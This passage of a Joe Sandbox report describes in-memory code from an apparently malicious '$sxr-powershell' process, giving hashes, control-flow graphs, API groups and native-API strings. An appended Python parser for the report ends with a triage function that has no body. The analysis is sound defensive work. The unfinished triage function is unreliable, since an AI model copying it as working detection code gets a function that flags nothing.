                                                                                                                      • Source File: 00000015.00000002.2925614777.00000242878B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000242878B0000, based on PE: true
                                                                                                                      • Associated: 00000015.00000002.2925614777.00000242878D5000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_21_2_242878b0000_$sxr-powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: FileHandleType
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3000768030-0
                                                                                                                      • Opcode ID: 886dffb09205d202da52528ad762ca177720b59a1f976d6d5f71bc5666910ac8
                                                                                                                      • Instruction ID: acb24ff799d9dac9ab70fd4ba2f8cd6780d5d0831aac91d3c5cf904bbf7fbd3c
                                                                                                                      • Opcode Fuzzy Hash: 886dffb09205d202da52528ad762ca177720b59a1f976d6d5f71bc5666910ac8
                                                                                                                      • Instruction Fuzzy Hash: 9131872261CF49E2E7648B179D9826C7A50F385BB0FA82709FB6A473E0CB34D455E760
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      control_flow_graph 20 7ffd9bab3ff5-7ffd9bab405d 25 7ffd9bab405f-7ffd9bab408e 20->25 29 7ffd9bab408f-7ffd9bab4091 25->29 29->25 30 7ffd9bab4093-7ffd9bab40b0 29->30 33 7ffd9bab4127-7ffd9bab4129 30->33 34 7ffd9bab40b2-7ffd9bab40c1 30->34 35 7ffd9bab412b-7ffd9bab41ff 33->35 36 7ffd9bab4114-7ffd9bab4124 33->36 34->29 40 7ffd9bab40c3-7ffd9bab40e0 34->40 42 7ffd9bab4217-7ffd9bab421e 35->42 43 7ffd9bab4201-7ffd9bab4215 35->43 36->33 50 7ffd9bab40e2-7ffd9bab40f9 40->50 46 7ffd9bab4220-7ffd9bab4223 42->46 47 7ffd9bab4231-7ffd9bab4258 42->47 43->42 46->47 49 7ffd9bab4225-7ffd9bab422f 46->49 53 7ffd9bab42cb-7ffd9bab42d2 47->53 54 7ffd9bab425a-7ffd9bab4265 47->54 49->47 60 7ffd9bab40fb-7ffd9bab410e 50->60 58 7ffd9bab42ea-7ffd9bab4310 53->58 59 7ffd9bab42d4-7ffd9bab42e8 53->59 54->53 57 7ffd9bab4267-7ffd9bab427f 54->57 61 7ffd9bab42c5-7ffd9bab42c9 57->61 62 7ffd9bab4281-7ffd9bab42b7 57->62 67 7ffd9bab4316-7ffd9bab437f 58->67 68 7ffd9bab43bb-7ffd9bab43ec 58->68 59->58 60->36 61->53 61->57 74 7ffd9bab433c-7ffd9bab433f 62->74 75 7ffd9bab42bd-7ffd9bab42c1 62->75 81 7ffd9bab4381-7ffd9bab438d call 7ffd9bab44bc 67->81 82 7ffd9bab4392-7ffd9bab43b5 call 7ffd9bab44bc 67->82 83 7ffd9bab443b-7ffd9bab4444 68->83 84 7ffd9bab43ee-7ffd9bab4407 68->84 76 7ffd9bab434c-7ffd9bab4359 74->76 77 7ffd9bab4341-7ffd9bab4345 74->77 75->61 77->76 90 7ffd9bab44ad-7ffd9bab44bb 81->90 82->67 82->68 91 7ffd9bab444b-7ffd9bab4487 83->91 92 7ffd9bab440a-7ffd9bab443a 84->92 97 7ffd9bab4497-7ffd9bab44a8 call 7ffd9bab4514 91->97 98 7ffd9bab4489-7ffd9bab4495 call 7ffd9bab4514 91->98 92->83 97->92 98->90
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000015.00000002.2992880520.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_21_2_7ffd9bab0000_$sxr-powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: _[_H
                                                                                                                      • API String ID: 0-2548533632
                                                                                                                      • Opcode ID: 7104ec7ebfa3e55d1329a9a186cf73294cb90d94bb4e6a53101bf7e76dcb2431
                                                                                                                      • Instruction ID: d214b61d3a71e2751346a1c9970142bccf1a4171393b9479f5cbbdb055a25618
                                                                                                                      • Opcode Fuzzy Hash: 7104ec7ebfa3e55d1329a9a186cf73294cb90d94bb4e6a53101bf7e76dcb2431
                                                                                                                      • Instruction Fuzzy Hash: C502E331B0DA9D4FEB54DB5CD465AED7BE0FF69310F0502BAD059C71A6CE64A842CB80
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      control_flow_graph 103 242878829a0-24287882a0b call 24287880f34 * 4 112 24287882a11-24287882a14 103->112 113 24287882c23 103->113 112->113 115 24287882a1a-24287882a1d 112->115 114 24287882c25-24287882c41 113->114 115->113 116 24287882a23-24287882a26 115->116 116->113 117 24287882a2c-24287882a4a VirtualAlloc 116->117 117->113 118 24287882a50-24287882a74 call 24287880d6c 117->118 121 24287882aa3-24287882aaa 118->121 122 24287882a76-24287882aa1 call 24287880d6c 118->122 123 24287882b4a-24287882b51 121->123 124 24287882ab0-24287882abd 121->124 122->121 128 24287882c04-24287882c21 123->128 129 24287882b57-24287882b6e 123->129 124->123 126 24287882ac3-24287882ad1 124->126 136 24287882ad3-24287882add 126->136 137 24287882b35-24287882b3d 126->137 128->114 129->128 130 24287882b74 129->130 131 24287882b7a-24287882b8f 130->131 134 24287882b91-24287882ba2 131->134 135 24287882bf3-24287882bfe 131->135 139 24287882bad-24287882bb1 134->139 140 24287882ba4-24287882bab 134->140 135->128 135->131 141 24287882ae0-24287882ae4 136->141 137->126 142 24287882b3f-24287882b44 137->142 144 24287882bbc-24287882bc0 139->144 145 24287882bb3-24287882bba 139->145 143 24287882be0-24287882bf1 140->143 146 24287882b32 141->146 147 24287882ae6-24287882aea 141->147 142->123 143->134 143->135 148 24287882bd2-24287882bd6 144->148 149 24287882bc2-24287882bd0 144->149 145->143 146->137 150 24287882aec-24287882b13 147->150 151 24287882b15-24287882b1f 147->151 148->143 153 24287882bd8-24287882bdb 148->153 149->143 152 24287882b25-24287882b30 150->152 151->152 152->141 153->143
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000015.00000002.2924790905.0000024287880000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000024287880000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_21_2_24287880000_$sxr-powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AllocVirtual
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4275171209-0
                                                                                                                      • Opcode ID: c08d5994cd16833e0b2f32063a698386d398f42b663dd23f5820244360bcf6f8
                                                                                                                      • Instruction ID: 7e7fe016f8ee541e9a8637d59e031e6b57447664a73ffc7212526a8ecc6d4f7a
                                                                                                                      • Opcode Fuzzy Hash: c08d5994cd16833e0b2f32063a698386d398f42b663dd23f5820244360bcf6f8
                                                                                                                      • Instruction Fuzzy Hash: FE613322702A54C7EB68CF16D85877DB391FB88BA5F848421EA1907785DB38E896D720
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000015.00000002.2925614777.00000242878B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000242878B0000, based on PE: true
                                                                                                                      • Associated: 00000015.00000002.2925614777.00000242878D5000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_21_2_242878b0000_$sxr-powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AllocHeap
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4292702814-0
                                                                                                                      • Opcode ID: 99623a56c0c66f7076cff61b7992f2e54951593381f89bb610799b11ef7b8552
                                                                                                                      • Instruction ID: 98e063cdbc52e38a77dc94b9abb3dbcada286aff70d5b4ecfa3f933ba910b942
                                                                                                                      • Opcode Fuzzy Hash: 99623a56c0c66f7076cff61b7992f2e54951593381f89bb610799b11ef7b8552
                                                                                                                      • Instruction Fuzzy Hash: FBF06D50702E0DC9FF945B739C4D39D36805BC8B88FCC4420690A977E1E92CC449A230
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      control_flow_graph 171 242878bb978-242878bb97b 172 242878bb97d-242878bb996 HeapFree 171->172 173 242878bb9b4 171->173 174 242878bb9af-242878bb9b3 172->174 175 242878bb998 call 242878bb8e0 172->175 174->173 175->174
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000015.00000002.2925614777.00000242878B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000242878B0000, based on PE: true
                                                                                                                      • Associated: 00000015.00000002.2925614777.00000242878D5000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_21_2_242878b0000_$sxr-powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: FreeHeap
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3298025750-0
                                                                                                                      • Opcode ID: 7994f22efeca7fbf2ebf4fa9e0693c4504f092aa8c4df1e1e5e2e684e68eef88
                                                                                                                      • Instruction ID: 1a415a76282bdc8ced463fd882a728d6376ac9e19e9a47b1e314bb618ea4f4b0
                                                                                                                      • Opcode Fuzzy Hash: 7994f22efeca7fbf2ebf4fa9e0693c4504f092aa8c4df1e1e5e2e684e68eef88
                                                                                                                      • Instruction Fuzzy Hash: 1BD0C951A12D4DCAFAA897B36C4E37925519BD4788F844424B91981261AA1444997261
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000015.00000002.2994360621.00007FFD9BB80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB80000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_21_2_7ffd9bb80000_$sxr-powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 5d95420201749429e37557cbd4dd8584de37be0e89075f7eeb903aa259c68238
                                                                                                                      • Instruction ID: 47d0131ffb95c2844b83da07313208fc19a4733cdcafb15178d47b8d978a6604
                                                                                                                      • Opcode Fuzzy Hash: 5d95420201749429e37557cbd4dd8584de37be0e89075f7eeb903aa259c68238
                                                                                                                      • Instruction Fuzzy Hash: 17E1E362A0FFC90FE7A3977848355A43FE0EF56654B4A01FBD099CB1E3D918AD068351
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000015.00000002.2994360621.00007FFD9BB80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB80000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_21_2_7ffd9bb80000_$sxr-powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 9aca145a432aa0588b50bdd6e251f33a5e5336b562121225c592f5829653bcec
                                                                                                                      • Instruction ID: 34ce8096ecf83e69ed1cc16c1a60d265ef2edf98168068361305d802be9841f4
                                                                                                                      • Opcode Fuzzy Hash: 9aca145a432aa0588b50bdd6e251f33a5e5336b562121225c592f5829653bcec
                                                                                                                      • Instruction Fuzzy Hash: C0913622A0FE8D0FE7A6976848715B47BE0EF46694F4A01FBD09CC70E3D928AD06C351
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      Nodes (basic-block address ranges): 309: 7ffd9bab2af3-7ffd9bab2b41; 318: 7ffd9bab2b5c-7ffd9bab2be0; 319: 7ffd9bab2b43-7ffd9bab2b51; 320: 7ffd9bab2b52-7ffd9bab2b5a; 328: 7ffd9bab2bf7-7ffd9bab2c06; 329: 7ffd9bab2be2-7ffd9bab2bf5; 332: 7ffd9bab2c0d-7ffd9bab2c23
                                                                                                                      Edges (src->dst): 309->318, 309->319, 318->328, 318->329, 319->320, 320->318, 320->320, 328->332, 329->328
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000015.00000002.2992880520.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_21_2_7ffd9bab0000_$sxr-powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 3606a6ec8072584ebbfa3c2e5bae8713c44c69c7a7220e1ba464bd0c788fea5e
                                                                                                                      • Instruction ID: 9ae6fe134aa61cac1d1ad588b0a070dee5a146a346644a80cf54ebb57bb74430
                                                                                                                      • Opcode Fuzzy Hash: 3606a6ec8072584ebbfa3c2e5bae8713c44c69c7a7220e1ba464bd0c788fea5e
                                                                                                                      • Instruction Fuzzy Hash: B141FB22B0E7650FE765E7ACB4F15E53B90DF6523EB0801BBD499CE1E7DC0868468385
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000015.00000002.2994360621.00007FFD9BB80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB80000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_21_2_7ffd9bb80000_$sxr-powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 3085eeafb9e61dde4edb09c3f672a3775032717cfb9197180e9598f0638652d0
                                                                                                                      • Instruction ID: 21fa85c202020ba47bb876457444e07029bf8b3c512566941002a87b8e456449
                                                                                                                      • Opcode Fuzzy Hash: 3085eeafb9e61dde4edb09c3f672a3775032717cfb9197180e9598f0638652d0
                                                                                                                      • Instruction Fuzzy Hash: BB411622E0FE8D0FE7B5966894B52B47BD0FF45B94F8A00BAD05CC71E3D9286D058351
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      Nodes (basic-block address ranges): 391: 7ffd9bab33a5-7ffd9bab33af; 392: 7ffd9bab33f1-7ffd9bab3420; 393: 7ffd9bab33b1-7ffd9bab33c5; 396: 7ffd9bab3437-7ffd9bab3463; 397: 7ffd9bab3422-7ffd9bab342c; 398: 7ffd9bab342e-7ffd9bab3435
                                                                                                                      Edges (src->dst): 391->392, 391->393, 392->396, 392->397, 397->398, 398->396
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000015.00000002.2992880520.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_21_2_7ffd9bab0000_$sxr-powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 2715c2e13effecfb1429ee149fb737ed92dc673caee9d4889d32dee4cbb7128d
                                                                                                                      • Instruction ID: cb3f4c1f11460bc1bff6b97264e34216e08284ea7978cba6295b6a78ad5c9195
                                                                                                                      • Opcode Fuzzy Hash: 2715c2e13effecfb1429ee149fb737ed92dc673caee9d4889d32dee4cbb7128d
                                                                                                                      • Instruction Fuzzy Hash: 2D110322B1EEC90FE796D33858656642BE0EF9A204B4A01FBC05CCB2A7DC08A8058341
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      Nodes (basic-block address ranges): 402: 7ffd9bab33ec-7ffd9bab3420; 404: 7ffd9bab3437-7ffd9bab3463; 405: 7ffd9bab3422-7ffd9bab3435
                                                                                                                      Edges (src->dst): 402->404, 402->405, 405->404
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000015.00000002.2992880520.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_21_2_7ffd9bab0000_$sxr-powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 369b88a28f7c05d8c0e0abc5d6baef95ee437fc3d1cbf0d254cdd96001eb16ff
                                                                                                                      • Instruction ID: d0c360700508f62b1b98b8816c6baf43861f8afd3636b1a950a59bca23040187
                                                                                                                      • Opcode Fuzzy Hash: 369b88a28f7c05d8c0e0abc5d6baef95ee437fc3d1cbf0d254cdd96001eb16ff
                                                                                                                      • Instruction Fuzzy Hash: 53014722B2DE8E0FE798E36C54A427867D0EBA8214B4401FBD01DC72A9CC58AC024340
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      Nodes (basic-block address ranges): 410: 7ffd9bab3cf9-7ffd9bab3cfb; 411: 7ffd9bab3d45-7ffd9bab3d67; 412: 7ffd9bab3cfd-7ffd9bab3d26; 416: 7ffd9bab3d2a-7ffd9bab3d3c; 417: 7ffd9bab3d41-7ffd9bab3d44
                                                                                                                      Edges (src->dst): 410->411, 410->412, 412->416, 416->417, 417->411
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000015.00000002.2992880520.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_21_2_7ffd9bab0000_$sxr-powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: bf2751ef55c665aff01e41f41a14ea320b18bc0fc293de3ccf6fce87d8dc1143
                                                                                                                      • Instruction ID: bfc0933a42f260a83bef2ad8167715c5531943cfd50ec85bbeaadd7065d2b760
                                                                                                                      • Opcode Fuzzy Hash: bf2751ef55c665aff01e41f41a14ea320b18bc0fc293de3ccf6fce87d8dc1143
                                                                                                                      • Instruction Fuzzy Hash: 8D01D83271CA0D4FEB98DA1CE85157133D1EBE9320F10057FE44AC7296D826F9478740
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      Nodes (basic-block address ranges): 418: 7ffd9bab3d68-7ffd9bab3d6d; 420: 7ffd9bab3d41-7ffd9bab3d67
                                                                                                                      Edges (src->dst): 418->420
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000015.00000002.2992880520.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_21_2_7ffd9bab0000_$sxr-powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 23dab133d60369e39cc8f2f524a89731ce62384872f4ecf44cab9d93a85f5f1c
                                                                                                                      • Instruction ID: fa4c20de2378ec7f13d0e4bd28f131df8fda48e98a36ce012c8bafa901a46184
                                                                                                                      • Opcode Fuzzy Hash: 23dab133d60369e39cc8f2f524a89731ce62384872f4ecf44cab9d93a85f5f1c
                                                                                                                      • Instruction Fuzzy Hash: 61F0A03271C6088FDB4CAA0CF8129B473D0EB99325B10016EF48BC2296E927E842CA81
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000015.00000002.2925614777.00000242878B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000242878B0000, based on PE: true
                                                                                                                      • Associated: 00000015.00000002.2925614777.00000242878D5000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_21_2_242878b0000_$sxr-powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                                                                                      • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                                                                                      • API String ID: 2119608203-3850299575
                                                                                                                      • Opcode ID: feab1d2498c9250a2661425e4b8a349dfcf4a1842f0d5ab31da7a7890f0a6070
                                                                                                                      • Instruction ID: e8fc43d282ff817fdb2e7ffed006ba8edfb5ab155a8182f3f93681aba050cadf
                                                                                                                      • Opcode Fuzzy Hash: feab1d2498c9250a2661425e4b8a349dfcf4a1842f0d5ab31da7a7890f0a6070
                                                                                                                      • Instruction Fuzzy Hash: 41B18E22211E99C2EB648F27DC487AD73A4FBC4B94F945016FE0953B95DB35CC89E360
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000015.00000002.2925614777.00000242878B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000242878B0000, based on PE: true
                                                                                                                      • Associated: 00000015.00000002.2925614777.00000242878D5000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_21_2_242878b0000_$sxr-powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3140674995-0
                                                                                                                      • Opcode ID: 86c6cc936ed28f5d2962041aedd63c90dfcb8f061e08dbf1cd00c8f518c42c6a
                                                                                                                      • Instruction ID: b2c7f5da0dfdc04dad31719fe8fa5608131db3973d0fdec6922bc5db2ac3a904
                                                                                                                      • Opcode Fuzzy Hash: 86c6cc936ed28f5d2962041aedd63c90dfcb8f061e08dbf1cd00c8f518c42c6a
                                                                                                                      • Instruction Fuzzy Hash: 6B313972205F84C6EBA08F62E8847DD7364F784744F84442AEA4E57B95DF38C5499724
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000015.00000002.2925614777.00000242878B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000242878B0000, based on PE: true
                                                                                                                      • Associated: 00000015.00000002.2925614777.00000242878D5000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_21_2_242878b0000_$sxr-powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1239891234-0
                                                                                                                      • Opcode ID: 2df9c3f406e14fd3d0afe694dc4f4ee33357f5db5aa88c620fdb935c0216887e
                                                                                                                      • Instruction ID: 65c50acfdce31f57474f151be5413d3d2cbff502b09abcfa992f037cdedbf34c
                                                                                                                      • Opcode Fuzzy Hash: 2df9c3f406e14fd3d0afe694dc4f4ee33357f5db5aa88c620fdb935c0216887e
                                                                                                                      • Instruction Fuzzy Hash: BF316D32214F84DAEB608F26EC4839E77A4F7C9758F940116FA9D43B95DF38C54A9B10
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000015.00000002.2925614777.00000242878B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000242878B0000, based on PE: true
                                                                                                                      • Associated: 00000015.00000002.2925614777.00000242878D5000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_21_2_242878b0000_$sxr-powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorFileLastWrite$ConsoleOutput
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1443284424-0
                                                                                                                      • Opcode ID: 842ab73a7096774a6d188e7949bc9c8e52c1e7c3cc90b953deb272e28a8da832
                                                                                                                      • Instruction ID: 26ffe1bda86b0859e5fef5f50274fe9c531f28c6716193dedd5b4755879c8942
                                                                                                                      • Opcode Fuzzy Hash: 842ab73a7096774a6d188e7949bc9c8e52c1e7c3cc90b953deb272e28a8da832
                                                                                                                      • Instruction Fuzzy Hash: BEE11072B15A88CAF740CF66D8882DD7BB0F3C47C8F944106EE6A57B99DA38C51AD710
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%
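The records above are one-per-function output of the Joe Sandbox IDA plugin, and the triage value is in two fields: the "based on PE: false" dumps from process 21 ($sxr-powershell) at RWX addresses, which is code executing outside any mapped image, and the String ID entries that pair NT native API names with ntdll.dll. The following is an added example, not Joe Sandbox code and not part of the report: a parser for these records that applies both checks. Its input is a constructed excerpt copied from the records on this page. Assumptions: the fifth dot-separated field of the .sdmp file name is read as a Windows page-protection value (0x40 = PAGE_EXECUTE_READWRITE); the PID, snapshot number and base address fields are corroborated by the Snapshot File name and Offset on the page; the `$`-separated API ID groups are kept opaque because their encoding is not documented here.

```python
# Added example (not Joe Sandbox code): parse the per-function "Memory Dump
# Source" / "Similarity" records above and apply two triage rules to them.
# Reading field 5 of the .sdmp name as a page-protection value is an assumption.
from __future__ import annotations

import re
from dataclasses import dataclass, field

# Constructed input: two records copied from the report, page indentation removed.
SAMPLE_REPORT = """\
Memory Dump Source
• Source File: 00000015.00000002.2994360621.00007FFD9BB80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB80000, based on PE: false
• Snapshot File: hcaresult_21_2_7ffd9bb80000_$sxr-powershell.jbxd
• API ID:
• String ID:
• Instruction Fuzzy Hash: 17E1E362A0FFC90FE7A3977848355A43FE0EF56654B4A01FBD099CB1E3D918AD068351
Uniqueness Score: -1.00%
Memory Dump Source
• Source File: 00000015.00000002.2925614777.00000242878B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000242878B0000, based on PE: true
• Snapshot File: hcaresult_21_2_242878b0000_$sxr-powershell.jbxd
• API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
• String ID: NtQueryObject$\\Device\\Nsi$ntdll.dll
• Instruction Fuzzy Hash: 41B18E22211E99C2EB648F27DC487AD73A4FBC4B94F945016FE0953B95DB35CC89E360
Uniqueness Score: -1.00%
"""

FIELD_RE = re.compile(r"^•\s*([^:]+):\s*(.*)$")
SOURCE_RE = re.compile(r"^(?P<file>\S+\.sdmp), Offset: (?P<offset>[0-9A-Fa-f]+), based on PE: (?P<pe>true|false)$")
NATIVE_API_RE = re.compile(r"^(Nt|Zw)[A-Z]\w+$")
PAGE_EXECUTE_READWRITE = 0x40  # Windows page-protection constant


@dataclass
class DumpRecord:
    source_file: str = ""
    offset: int = 0
    based_on_pe: bool = False
    snapshot_file: str = ""
    api_groups: list[str] = field(default_factory=list)  # "$"-separated groups, kept opaque
    strings: list[str] = field(default_factory=list)     # "$"-separated string references
    instruction_fuzzy: str = ""
    uniqueness: float | None = None

    @property
    def process(self) -> str:  # "hcaresult_<pid>_<snap>_<base>_<image>.jbxd" -> "<image>"
        return self.snapshot_file.rsplit("_", 1)[-1].removesuffix(".jbxd")


def parse_sdmp_name(name: str) -> dict:
    """Eight dot-separated fields; PID, snapshot and base match the Snapshot File and Offset."""
    parts = name.removesuffix(".sdmp").split(".")
    if len(parts) != 8:
        raise ValueError(f"unexpected sdmp name: {name}")
    return {"pid": int(parts[0], 16), "snapshot": int(parts[1], 16), "dump_id": parts[2],
            "base": int(parts[3], 16),
            "protect": int(parts[4], 16),   # assumption: 0x40 == PAGE_EXECUTE_READWRITE
            "raw_flags": tuple(parts[5:])}  # meaning not documented on the page; left raw


def parse_records(text: str) -> list[DumpRecord]:
    """One DumpRecord per 'Memory Dump Source' block; lines not understood are skipped."""
    records: list[DumpRecord] = []
    cur = None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "Memory Dump Source":
            cur = DumpRecord()
            records.append(cur)
        elif cur is None:
            continue
        elif line.startswith("Uniqueness Score:"):
            cur.uniqueness = float(line.split(":", 1)[1].strip().rstrip("%"))
        elif (m := FIELD_RE.match(line)):
            key, value = m.group(1).strip(), m.group(2).strip()
            if key == "Source File" and (sm := SOURCE_RE.match(value)):
                cur.source_file = sm["file"]
                cur.offset = int(sm["offset"], 16)
                cur.based_on_pe = sm["pe"] == "true"
            elif key == "Snapshot File":
                cur.snapshot_file = value
            elif key == "API ID":
                cur.api_groups = value.split("$") if value else []
            elif key == "String ID":
                cur.strings = value.split("$") if value else []
            elif key == "Instruction Fuzzy Hash":
                cur.instruction_fuzzy = value
    return records


def triage(records: list[DumpRecord]) -> list[tuple[str, str]]:
    """Rule 1: executable code in a region not backed by a PE image (what in-memory
    unpacking or injection leaves behind). Rule 2: NT native API names next to
    ntdll.dll (run-time API resolution), plus any NT device path references."""
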